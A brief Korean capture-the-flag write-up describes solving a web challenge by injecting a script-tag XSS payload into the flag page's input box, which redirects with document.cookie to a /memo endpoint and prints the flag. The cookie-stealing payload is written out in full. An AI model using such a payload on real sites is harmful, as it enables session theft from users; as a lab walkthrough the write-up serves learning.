문제 사이트에 접속하면 3개의 연결된 페이지들의 목록이 나옵니다.
flag 페이지로 들어가면 입력창이 떠서 XSS 공격을 시도해볼 수 있습니다.
<script>location.href = "/memo?memo=" + document.cookie;</script>
script 태그를 이용해서 XSS 공격을 시도해 보면
공격이 성공해서 FLAG가 출력되었습니다.